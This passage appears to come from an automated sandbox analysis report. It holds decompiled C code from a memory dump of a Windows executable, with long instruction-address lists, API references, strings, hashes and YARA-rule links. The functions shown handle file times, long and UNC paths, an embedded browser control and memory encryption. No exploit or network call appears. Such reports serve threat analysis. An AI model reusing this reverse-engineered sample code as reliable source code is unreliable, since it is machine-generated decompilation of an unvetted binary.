													return E00D8E203(_t124, _v16 ^ _t221);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t195 = _v16;
									 *((intOrPtr*)(_v24 + _t198)) = _t195;
									_t198 = _t198 + 4;
									_t191 = _t195 + _v12;
									_v16 = _t195 + _v12;
									__eflags = _t198 - _t150;
								} while (_t198 != _t150);
								goto L23;
							}
						} else {
							_t199 = _t198 | 0xffffffff;
							L24:
							E00D97A50(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E00D9DD80( *_t207,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t207);
								L38();
								_t223 = _t223 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t207);
								L28();
								_t223 = _t223 + 0x10;
							}
							_t199 = _t146;
							__eflags = _t199;
							if(_t199 != 0) {
								break;
							}
							_t207 = _t207 + 4;
							_t159 = 0;
							__eflags =  *_t207;
							if( *_t207 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t198 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00D9A1ED( &_v36);
						_t91 = _t199;
						goto L26;
					}
				} else {
					_t147 = E00D97ECC();
					_t218 = 0x16;
					 *_t147 = _t218;
					E00D97DAB();
					_t91 = _t218;
					L26:
					return _t91;
				}
				L68:
			}





















































































              0x00d99e48
              0x00d99e4b
              0x00d99e51
              0x00d99e69
              0x00d99e6c
              0x00d99e70
              0x00d99e72
              0x00d99e74
              0x00d99e76
              0x00d99e79
              0x00d99e7c
              0x00d99e7f
              0x00d99e81
              0x00d99ed9
              0x00d99ed9
              0x00d99edf
              0x00d99ee1
              0x00d99eec
              0x00d99ef0
              0x00d99ef2
              0x00d99ef5
              0x00d99ef9
              0x00d99ef9
              0x00d99efb
              0x00d99efd
              0x00d99eff
              0x00d99f01
              0x00d99f01
              0x00d99f03
              0x00d99f06
              0x00d99f09
              0x00d99f09
              0x00d99f0b
              0x00d99f0c
              0x00d99f0c
              0x00d99f17
              0x00d99f19
              0x00d99f1c
              0x00d99f1d
              0x00d99f20
              0x00d99f20
              0x00d99f24
              0x00d99f27
              0x00d99f2a
              0x00d99f2a
              0x00d99f38
              0x00d99f3a
              0x00d99f3d
              0x00d99f3f
              0x00d99f49
              0x00d99f4c
              0x00d99f4f
              0x00d99f51
              0x00d99f54
              0x00d99f56
              0x00d99fa6
              0x00d99fa9
              0x00d99fa9
              0x00d99fab
              0x00000000
              0x00d99f58
              0x00d99f5a
              0x00d99f5a
              0x00d99f5c
              0x00d99f5f
              0x00d99f5f
              0x00d99f64
              0x00d99f67
              0x00d99f67
              0x00d99f69
              0x00d99f6a
              0x00d99f6a
              0x00d99f6e
              0x00d99f71
              0x00d99f71
              0x00d99f74
              0x00d99f77
              0x00d99f84
              0x00d99f89
              0x00d99f8c
              0x00d99f8e
              0x00d99fc8
              0x00d99fc9
              0x00d99fca
              0x00d99fcb
              0x00d99fcc
              0x00d99fcd
              0x00d99fd2
              0x00d99fd6
              0x00d99fd8
              0x00d99fd9
              0x00d99fdc
              0x00d99fdc
              0x00d99fdf
              0x00d99fdf
              0x00d99fe1
              0x00d99fe2
              0x00d99fe2
              0x00d99feb
              0x00d99fec
              0x00d99fef
              0x00d99ff2
              0x00d99ff5
              0x00d99ff7
              0x00d99ffe
              0x00d9a000
              0x00d9a003
              0x00d9a00d
              0x00d9a010
              0x00d9a011
              0x00d9a013
              0x00d9a027
              0x00d9a027
              0x00d9a02a
              0x00d9a034
              0x00d9a039
              0x00d9a03c
              0x00d9a03e
              0x00000000
              0x00d9a040
              0x00d9a044
              0x00d9a04d
              0x00d9a053
              0x00000000
              0x00d9a056
              0x00d9a015
              0x00d9a015
              0x00d9a01b
              0x00d9a020
              0x00d9a023
              0x00d9a025
              0x00d9a05c
              0x00d9a05e
              0x00d9a05f
              0x00d9a060
              0x00d9a061
              0x00d9a062
              0x00d9a063
              0x00d9a068
              0x00d9a06b
              0x00d9a06c
              0x00d9a06e
              0x00d9a074
              0x00d9a07b
              0x00d9a07e
              0x00d9a081
              0x00d9a082
              0x00d9a085
              0x00d9a086
              0x00d9a089
              0x00d9a08a
              0x00d9a0ab
              0x00d9a0ab
              0x00d9a0ad
              0x00000000
              0x00000000
              0x00d9a092
              0x00d9a094
              0x00d9a096
              0x00d9a098
              0x00d9a09a
              0x00d9a09c
              0x00d9a09e
              0x00d9a0a9
              0x00000000
              0x00d9a0a9
              0x00d9a09e
              0x00d9a09a
              0x00000000
              0x00d9a096
              0x00d9a0af
              0x00d9a0b1
              0x00d9a0b4
              0x00d9a0cd
              0x00d9a0cd
              0x00d9a0cf
              0x00d9a0d2
              0x00d9a0e2
              0x00d9a0e4
              0x00d9a0e4
              0x00d9a0d4
              0x00d9a0d4
              0x00d9a0d7
              0x00000000
              0x00d9a0d9
              0x00d9a0d9
              0x00d9a0dc
              0x00000000
              0x00d9a0de
              0x00d9a0de
              0x00d9a0de
              0x00d9a0dc
              0x00d9a0d7
              0x00d9a0f2
              0x00d9a0f6
              0x00d9a104
              0x00d9a109
              0x00d9a11e
              0x00d9a120
              0x00d9a126
              0x00d9a129
              0x00d9a15b
              0x00d9a15b
              0x00d9a160
              0x00d9a166
              0x00d9a166
              0x00d9a16d
              0x00d9a187
              0x00d9a187
              0x00d9a188
              0x00d9a18e
              0x00d9a194
              0x00d9a195
              0x00d9a196
              0x00d9a19b
              0x00d9a19e
              0x00d9a1a0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d9a16f
              0x00d9a16f
              0x00d9a175
              0x00d9a177
              0x00000000
              0x00d9a179
              0x00d9a179
              0x00d9a17c
              0x00000000
              0x00d9a17e
              0x00d9a17e
              0x00d9a185
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d9a185
              0x00d9a17c
              0x00d9a177
              0x00000000
              0x00d9a1a2
              0x00d9a1aa
              0x00d9a1b0
              0x00d9a1b2
              0x00d9a1b2
              0x00d9a1ba
              0x00d9a1bf
              0x00d9a1c7
              0x00d9a1ca
              0x00d9a1cc
              0x00d9a1e0
              0x00d9a1e5
              0x00d9a12b
              0x00d9a12b
              0x00d9a12c
              0x00d9a12d
              0x00d9a12e
              0x00d9a12f
              0x00d9a137
              0x00d9a137
              0x00d9a137
              0x00d9a139
              0x00d9a13c
              0x00d9a13f
              0x00d9a13f
              0x00d9a145
              0x00d9a0b6
              0x00d9a0b6
              0x00d9a0b9
              0x00d9a0bb
              0x00000000
              0x00d9a0bd
              0x00d9a0bd
              0x00d9a0c0
              0x00d9a0c1
              0x00d9a0c2
              0x00d9a0c3
              0x00d9a0c8
              0x00d9a0bb
              0x00d9a147
              0x00d9a14c
              0x00d9a157
              0x00000000
              0x00000000
              0x00000000
              0x00d9a025
              0x00d99ff9
              0x00d99ffb
              0x00d9a057
              0x00d9a05b
              0x00d9a05b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00d99f90
              0x00d99f93
              0x00d99f96
              0x00d99f99
              0x00d99f9c
              0x00d99f9f
              0x00d99fa2
              0x00d99fa2
              0x00000000
              0x00d99f5f
              0x00d99f41
              0x00d99f41
              0x00d99fad
              0x00d99faf
              0x00000000
              0x00d99fb4
              0x00d99e83
              0x00d99e83
              0x00d99e86
              0x00d99e8f
              0x00d99e92
              0x00d99e99
              0x00d99e9b
              0x00d99eb4
              0x00d99eb5
              0x00d99eb6
              0x00d99eb8
              0x00d99ebd
              0x00d99e9d
              0x00d99e9d
              0x00d99ea0
              0x00d99ea1
              0x00d99ea3
              0x00d99ea5
              0x00d99ea7
              0x00d99eac
              0x00d99eac
              0x00d99ec0
              0x00d99ec2
              0x00d99ec4
              0x00000000
              0x00000000
              0x00d99eca
              0x00d99ecd
              0x00d99ecf
              0x00d99ed1
              0x00000000
              0x00d99ed3
              0x00d99ed3
              0x00d99ed6
              0x00000000
              0x00d99ed6
              0x00000000
              0x00d99ed1
              0x00d99fb5
              0x00d99fb8
              0x00d99fbd
              0x00000000
              0x00d99fc0
              0x00d99e53
              0x00d99e53
              0x00d99e5a
              0x00d99e5b
              0x00d99e5d
              0x00d99e62
              0x00d99fc1
              0x00d99fc5
              0x00d99fc5
              0x00000000

              APIs
              • _free.LIBCMT ref: 00D99FAF
                • Part of subcall function 00D97DBB: IsProcessorFeaturePresent.KERNEL32(00000017,00D97DAA,0000002C,00DAA968,00D9AF68,00000000,00000000,00D98599,?,?,00D97DB7,00000000,00000000,00000000,00000000,00000000), ref: 00D97DBD
                • Part of subcall function 00D97DBB: GetCurrentProcess.KERNEL32(C0000417,00DAA968,0000002C,00D97AE8,00000016,00D98599), ref: 00D97DDF
                • Part of subcall function 00D97DBB: TerminateProcess.KERNEL32(00000000), ref: 00D97DE6
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
              • String ID: *?$.
              • API String ID: 2667617558-3972193922
              • Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
              • Instruction ID: 379a6fab4df427a7e10e2bcbb912212c90d3f771d3fcb19d6e2a4c686afcad6f
              • Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
              • Instruction Fuzzy Hash: 06516F75E0020AAFDF14DFACC891AADFBB5EF98314F28416DE854E7341E6759E018B60
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D77570, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E00D77570(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E00D8D870(E00DA1298, _t108);
				E00D8D940();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E00D7FAB1(_t108 - 0x1010, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E00D77773(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E00D7FA89(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
							E00D76EF9(_t108 - 0x307c);
							_push(0);
							_t54 = E00D7A1B1(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
							_t85 =  *(_t108 - 0x2074);
							 *((char*)(_t108 + 0x13)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E00D7A12F(_t106, _t85 & 0xfffffffe);
							}
							E00D7943C(_t108 - 0x2034);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00D79BE6(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x2034);
								_push(0);
								_t68 = E00D7399D(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E00D794DA(_t108 - 0x2034);
								}
							}
							E00D7943C(_t108 - 0x50a0);
							__eflags =  *((char*)(_t108 + 0x13));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 + 0x13)) != 0) {
								_t62 = E00D79768(_t108 - 0x50a0, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
								}
							}
							E00D7A12F(_t106,  *(_t108 - 0x2074));
							E00D7946E(_t108 - 0x50a0);
							_t90 = _t108 - 0x2034;
						} else {
							E00D7943C(_t108 - 0x60c4);
							_push(1);
							_push(_t108 - 0x60c4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00D7399D(_t81, _t99);
							_t90 = _t108 - 0x60c4;
						}
						_t61 = E00D7946E(_t90);
					} else {
						E00D76BF5(_t113, 0x53, _t81 + 0x1e, _t106);
						_t61 = E00D76E03(0xdb00e0, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E00D7FAB1(_t108 - 0x1010, 0xda2490, 0x802);
					E00D7FA89(_t112, _t108 - 0x1010, _t106, 0x802);
					goto L4;
				}
			}















              0x00d77570
              0x00d77575
              0x00d7757f
              0x00d77586
              0x00d7758f
              0x00d775be
              0x00d775be
              0x00d775cc
              0x00d775d1
              0x00d775d1
              0x00d775e1
              0x00d775e6
              0x00d775ee
              0x00d7760d
              0x00d77611
              0x00d7764e
              0x00d77659
              0x00d77666
              0x00d77669
              0x00d7766e
              0x00d77674
              0x00d77677
              0x00d7767a
              0x00d7767c
              0x00d77681
              0x00d77681
              0x00d7768c
              0x00d77699
              0x00d776a7
              0x00d776ac
              0x00d776ae
              0x00d776b0
              0x00d776b9
              0x00d776ba
              0x00d776bb
              0x00d776c0
              0x00d776c2
              0x00d776ca
              0x00d776ca
              0x00d776c2
              0x00d776d5
              0x00d776da
              0x00d776de
              0x00d776e2
              0x00d776ed
              0x00d776f2
              0x00d776f4
              0x00d77711
              0x00d77711
              0x00d776f4
              0x00d7771e
              0x00d77729
              0x00d7772e
              0x00d77613
              0x00d77619
              0x00d7761e
              0x00d77628
              0x00d77629
              0x00d7762c
              0x00d7762f
              0x00d77634
              0x00d77634
              0x00d77734
              0x00d775f0
              0x00d775f7
              0x00d77603
              0x00d77603
              0x00d7773f
              0x00d77749
              0x00d77749
              0x00d77591
              0x00d77595
              0x00000000
              0x00d77597
              0x00d77597
              0x00d775a9
              0x00d775b7
              0x00000000
              0x00d775b7

              APIs
              • __EH_prolog.LIBCMT ref: 00D77575
              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D77711
                • Part of subcall function 00D7A12F: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D79F65,?,?,?,00D79DFE,?,00000001,00000000,?,?), ref: 00D7A143
                • Part of subcall function 00D7A12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D79F65,?,?,?,00D79DFE,?,00000001,00000000,?,?), ref: 00D7A174
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$Attributes$H_prologTime
              • String ID: :
              • API String ID: 1861295151-336475711
              • Opcode ID: 436e7601c845d5f69f99a55ee529b2643fa88a4b93faed14ee89e37456e08a20
              • Instruction ID: ef5b1eab2e35bf95204464ebf028f35d8050c472457e6fd9a5d5e839bd679f1c
              • Opcode Fuzzy Hash: 436e7601c845d5f69f99a55ee529b2643fa88a4b93faed14ee89e37456e08a20
              • Instruction Fuzzy Hash: B9419172804218AADB24EB64CC55EEEB77CEF45300F448499B64DA6092FB709F88CF71
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7B32C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
              Download Yara Rule
              C-Code - Quality: 81%
              			E00D7B32C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E00D8D940();
				_t71 = _a4;
				if( *_t71 != 0) {
					E00D7B4C6(_t71);
					_t66 = E00D92B33(_t71);
					_t30 = E00D7B4F2(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E00D7B5CD( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E00D7AEA5(__eflags,  &_v4100, 0x800);
							_t39 = E00D92B33( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E00D7FAB1(_a8, L"\\\\?\\", _t69);
							E00D7FA89(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E00D7B5CD(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E00D7FA89(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E00D7FAB1(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E00D7FA89(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E00D7B4C6(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E00D7FAB1(_a8, L"\\\\?\\", _t73);
						E00D7FA89(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E00D7FAB1(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}
















              0x00d7b334
              0x00d7b33a
              0x00d7b341
              0x00d7b34d
              0x00d7b35a
              0x00d7b35c
              0x00d7b361
              0x00d7b363
              0x00d7b3e9
              0x00d7b3ef
              0x00d7b3f1
              0x00d7b4b0
              0x00d7b4b0
              0x00d7b4b0
              0x00d7b4b2
              0x00000000
              0x00d7b4b3
              0x00d7b3f7
              0x00d7b3f9
              0x00000000
              0x00000000
              0x00d7b408
              0x00d7b40a
              0x00d7b44f
              0x00d7b45b
              0x00d7b465
              0x00d7b469
              0x00d7b46b
              0x00000000
              0x00000000
              0x00d7b476
              0x00d7b486
              0x00d7b48b
              0x00d7b48f
              0x00d7b49b
              0x00d7b49d
              0x00d7b49f
              0x00d7b49f
              0x00d7b49f
              0x00d7b49d
              0x00d7b4a2
              0x00d7b4a2
              0x00d7b4a3
              0x00d7b4a3
              0x00d7b4a4
              0x00d7b4a4
              0x00d7b4a7
              0x00d7b4ac
              0x00000000
              0x00d7b4ac
              0x00d7b40c
              0x00d7b40f
              0x00d7b412
              0x00d7b414
              0x00000000
              0x00000000
              0x00d7b423
              0x00d7b42a
              0x00d7b43c
              0x00000000
              0x00d7b43c
              0x00d7b366
              0x00d7b36b
              0x00d7b36d
              0x00d7b395
              0x00d7b396
              0x00d7b399
              0x00000000
              0x00000000
              0x00d7b39f
              0x00d7b3a2
              0x00d7b3a5
              0x00000000
              0x00000000
              0x00d7b3ab
              0x00d7b3ae
              0x00d7b3b1
              0x00d7b3b3
              0x00000000
              0x00000000
              0x00d7b3c2
              0x00d7b3d0
              0x00d7b3d5
              0x00d7b3d6
              0x00000000
              0x00d7b3d6
              0x00d7b36f
              0x00d7b372
              0x00d7b375
              0x00000000
              0x00000000
              0x00d7b386
              0x00d7b38b
              0x00000000
              0x00d7b343
              0x00d7b343
              0x00d7b4b4
              0x00d7b4b8
              0x00d7b4b8

              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID: UNC$\\?\
              • API String ID: 0-253988292
              • Opcode ID: 1058c04d2b3612c20dc0500b8e6a65af583f7e257852d40595903fcbce1444da
              • Instruction ID: 5e82ae3eef37336724c97f63574d28d60169ab07b13941838e78364707b0bcfa
              • Opcode Fuzzy Hash: 1058c04d2b3612c20dc0500b8e6a65af583f7e257852d40595903fcbce1444da
              • Instruction Fuzzy Hash: 53419D31800259BACF21AF61CC45FAB77A9EF05779B04C467F85CA3142F7749A808BB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D88A07, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
              Download Yara Rule
              C-Code - Quality: 70%
              			E00D88A07(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				char _t19;
				intOrPtr* _t23;
				signed int _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t38;
				void* _t43;
				intOrPtr _t44;
				signed int* _t48;

				_t44 = _a4;
				_t43 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _t44;
				_t18 = E00D8D82C(__edx, _t44, __eflags, 0x30);
				_a4 = _t18;
				if(_t18 == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E00D883B5(_t18);
				}
				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
				if(_t19 == 0) {
					return _t19;
				} else {
					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
					E00D89184( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
					E00D8931D( *((intOrPtr*)(_t43 + 0xc)), 1);
					E00D892D3( *((intOrPtr*)(_t43 + 0xc)), 1);
					_t23 = E00D89238( *((intOrPtr*)(_t43 + 0xc)));
					_t28 = _t23;
					if(_t28 == 0) {
						L7:
						__eflags =  *(_t43 + 0x10);
						if( *(_t43 + 0x10) != 0) {
							E00D88581(_t43);
							_t25 =  *(_t43 + 0x10);
							_push(0);
							_push(0);
							_push(0);
							 *((char*)(_t43 + 0x25)) = 0;
							_t38 =  *_t25;
							_push(0);
							__eflags =  *(_t43 + 0x20);
							if( *(_t43 + 0x20) == 0) {
								_push(L"about:blank");
							} else {
								_push( *(_t43 + 0x20));
							}
							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
						}
						L12:
						return _t23;
					}
					_t10 = _t43 + 0x10; // 0x10
					_t48 = _t10;
					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0xda412c, _t48);
					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
					if(_t26 >= 0) {
						goto L7;
					}
					 *_t48 =  *_t48 & 0x00000000;
					goto L12;
				}
			}














              0x00d88a08
              0x00d88a0d
              0x00d88a11
              0x00d88a14
              0x00d88a19
              0x00d88a20
              0x00d88a2b
              0x00d88a2b
              0x00d88a22
              0x00d88a24
              0x00d88a24
              0x00d88a2d
              0x00d88a32
              0x00d88abd
              0x00d88a38
              0x00d88a3a
              0x00d88a45
              0x00d88a4f
              0x00d88a59
              0x00d88a61
              0x00d88a66
              0x00d88a6a
              0x00d88a8c
              0x00d88a8e
              0x00d88a91
              0x00d88a95
              0x00d88a9a
              0x00d88a9d
              0x00d88a9e
              0x00d88a9f
              0x00d88aa0
              0x00d88aa3
              0x00d88aa5
              0x00d88aa6
              0x00d88aa9
              0x00d88ab0
              0x00d88aab
              0x00d88aab
              0x00d88aab
              0x00d88ab6
              0x00d88ab6
              0x00d88ab9
              0x00000000
              0x00d88aba
              0x00d88a6e
              0x00d88a6e
              0x00d88a78
              0x00d88a7f
              0x00d88a84
              0x00000000
              0x00000000
              0x00d88a86
              0x00000000
              0x00d88a86

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID: Shell.Explorer$about:blank
              • API String ID: 0-874089819
              • Opcode ID: 6ddc819d5e00205836fd33da49b1b7509e9fec5683ef7ee3b8f7a5ca85518800
              • Instruction ID: ae2bc00f9c7ac56d8fbeaf3dde2db5af7da4e2d1a9a57cfb5c0b2a7aa3e96c28
              • Opcode Fuzzy Hash: 6ddc819d5e00205836fd33da49b1b7509e9fec5683ef7ee3b8f7a5ca85518800
              • Instruction Fuzzy Hash: 1A215B71640606BFD708BBA0C8A1E26B369FF45710B48822AB1159B682DFB0E811DBB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7E862, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
              Download Yara Rule
              C-Code - Quality: 20%
              			E00D7E862(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t11;
				intOrPtr* _t12;
				signed char _t13;
				void* _t17;
				signed char _t18;
				void* _t20;
				signed int _t22;
				signed int _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				signed int _t36;

				_t32 = __edi;
				_t17 = __ebx;
				_t11 =  *0xdb7358; // 0x0
				if(_t11 == 0) {
					E00D7E7E3(0xdb7350);
					_t11 =  *0xdb7358; // 0x0
				}
				_t36 = _a8;
				_t22 = _t36 & 0xfffffff0;
				_t30 = 0 | _a16 != 0x00000000;
				if(_a12 == 0) {
					_t12 =  *0xdb735c; // 0x0
					if(_t12 == 0) {
						goto L10;
					} else {
						_t13 =  *_t12(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptUnprotectMemory failed");
							goto L6;
						}
					}
				} else {
					if(_t11 == 0) {
						L10:
						_push(_t17);
						_t13 = GetCurrentProcessId();
						_t31 = 0;
						_t18 = _t13;
						if(_t36 != 0) {
							_push(_t32);
							_t33 = _a4;
							_t20 = _t18 + 0x4b;
							do {
								_t13 = _t31 + _t20;
								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
								_t31 = _t31 + 1;
							} while (_t31 < _t36);
						}
					} else {
						_t13 =  *_t11(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptProtectMemory failed");
							L6:
							_push(0xdb00e0);
							_t13 = E00D76CC9(E00D8E214(E00D76CCE(_t22)), 0xdb00e0, 0xdb00e0, 2);
						}
					}
				}
				return _t13;
			}

















              0x00d7e862
              0x00d7e862
              0x00d7e865
              0x00d7e86c
              0x00d7e873
              0x00d7e878
              0x00d7e878
              0x00d7e87e
              0x00d7e885
              0x00d7e88b
              0x00d7e892
              0x00d7e8c7
              0x00d7e8ce
              0x00000000
              0x00d7e8d0
              0x00d7e8d5
              0x00d7e8d9
              0x00d7e8db
              0x00000000
              0x00d7e8db
              0x00d7e8d9
              0x00d7e894
              0x00d7e896
              0x00d7e8e2
              0x00d7e8e2
              0x00d7e8e3
              0x00d7e8e9
              0x00d7e8eb
              0x00d7e8ef
              0x00d7e8f1
              0x00d7e8f2
              0x00d7e8f5
              0x00d7e8f8
              0x00d7e8fb
              0x00d7e8fe
              0x00d7e900
              0x00d7e901
